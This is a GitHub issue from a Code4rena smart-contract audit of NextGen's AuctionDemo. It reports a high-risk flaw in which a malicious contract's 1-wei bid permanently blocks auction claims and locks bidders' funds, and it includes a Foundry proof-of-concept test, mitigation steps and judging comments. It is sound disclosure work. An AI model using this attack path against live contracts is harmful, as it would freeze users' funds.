Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Attacker can permanently DoS every auction in AuctionDemo #1508

Closed
c4-submissions opened this issue Nov 13, 2023 · 7 comments
Closed

Attacker can permanently DoS every auction in AuctionDemo #1508

c4-submissions opened this issue Nov 13, 2023 · 7 comments
Labels
3 (High Risk) Assets can be stolen/lost/compromised directly bug Something isn't working duplicate-734 satisfactory satisfies C4 submission criteria; eligible for awards

Comments

@c4-submissions
Copy link
Contributor

Lines of code

https://github.com/code-423n4/2023-10-nextgen/blob/main/smart-contracts/AuctionDemo.sol#L104-L120

Vulnerability details

Impact

An attacker can disrupt every auction in AuctionDemo permanently by placing a minimal bid of 1 wei with a malicious contract during the auction's initiation. This action can result in a permanent Denial-of-Service (DoS), effectively locking all user funds in the contract.

Note

Attackers can exploit this using onERC721Received too, but it's costlier since they need to be the highest bidder to claim the NFT.

Proof of Concept

Here is a coded PoC to demonstrate the issue:

    function testDoSAuctionDemo() public {
        // @audit-info The attacker can keep repredoucing this attack for every token id with no cost but gas

        vm.prank(genAdminOwner);
        minterContract.mintAndAuction({
            _recipient: artist1,
            _tokenData: "",
            _saltfun_o: 0,
            _collectionID: 1,
            _auctionEndTime: block.timestamp + 1 days
        });
        assertEq(minterContract.getAuctionStatus(10000000000), true);

        vm.prank(artist1);
        nextGenCore.approve(address(auctionDemo), 10000000000);

        address attacker = makeAddr("attacker");
        vm.label(attacker, "attacker");

        // Attacker will bid first to make his attack as cheep as possible

        deal(attacker, 1 wei);

        vm.startPrank(attacker);
        PDos permanentDos = new PDos(auctionDemo, 10000000000);
        permanentDos.bid{value: 1 wei}();
        vm.stopPrank();

        hoax(bidder1, 1e18);
        auctionDemo.participateToAuction{value: 1e18}(10000000000);

        hoax(bidder2, 2e18);
        auctionDemo.participateToAuction{value: 2e18}(10000000000);

        vm.warp(block.timestamp + 1 days);

        vm.prank(bidder2);
        auctionDemo.claimAuction(10000000000);
    }

Test Result:

memory allocation of 12884901888 bytes failed

Test Setup:

Tools Used

Manual review

Recommended Mitigation Steps

To mitigate this vulnerability, consider implementing the following steps:

  1. During the winner claim process, transfer the NFT and pay the owner.
  2. Implement a separate refund function to allow bidders to claim refunds individually.

Assessed type

DoS

@c4-submissions c4-submissions added 3 (High Risk) Assets can be stolen/lost/compromised directly bug Something isn't working labels Nov 13, 2023
c4-submissions added a commit that referenced this issue Nov 13, 2023
@c4-pre-sort
Copy link

141345 marked the issue as duplicate of #1952

@c4-judge
Copy link

alex-ppg marked the issue as not a duplicate

@c4-judge
Copy link

alex-ppg marked the issue as primary issue

@c4-judge c4-judge added the primary issue Highest quality submission among a set of duplicates label Nov 29, 2023
@c4-judge
Copy link

c4-judge commented Dec 7, 2023

alex-ppg marked the issue as duplicate of #734

@c4-judge c4-judge closed this as completed Dec 7, 2023
@c4-judge c4-judge added duplicate-734 and removed primary issue Highest quality submission among a set of duplicates labels Dec 7, 2023
@c4-judge
Copy link

c4-judge commented Dec 8, 2023

alex-ppg marked the issue as satisfactory

@c4-judge c4-judge added the satisfactory satisfies C4 submission criteria; eligible for awards label Dec 8, 2023
@0xbtk
Copy link

0xbtk commented Dec 9, 2023

Hey @alex-ppg, can you consider choosing #1508 for the report over #734. Although #734 has a solid explanation and acknowledgment of the bot issues, it lacks a detailed attack path and a coded PoC, in fact, it merely states,: "With the current implementation, a gas bomb can be implemented to perform the attack."

In contrast, #1508, provides a valid/running PoC, a clear impact with the acknowledgment of #739 (left a comment there too).

That being said, I am aware that a report being "better" is extremely subjective, and will respect your final decision as a judge.

Thanks!

@alex-ppg
Copy link

alex-ppg commented Dec 9, 2023

Hey @0xbtk, thanks for your contribution to the PJQA process! I understand your concern and criticism but will retain my current judgment. Given that this submission refers to a direct escalation of a bot report finding, it must be mentioned for transparency. As such, I have opted to award the selected-for-report grade to the #734 submission.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
3 (High Risk) Assets can be stolen/lost/compromised directly bug Something isn't working duplicate-734 satisfactory satisfies C4 submission criteria; eligible for awards
Projects
None yet
Development

No branches or pull requests

5 participants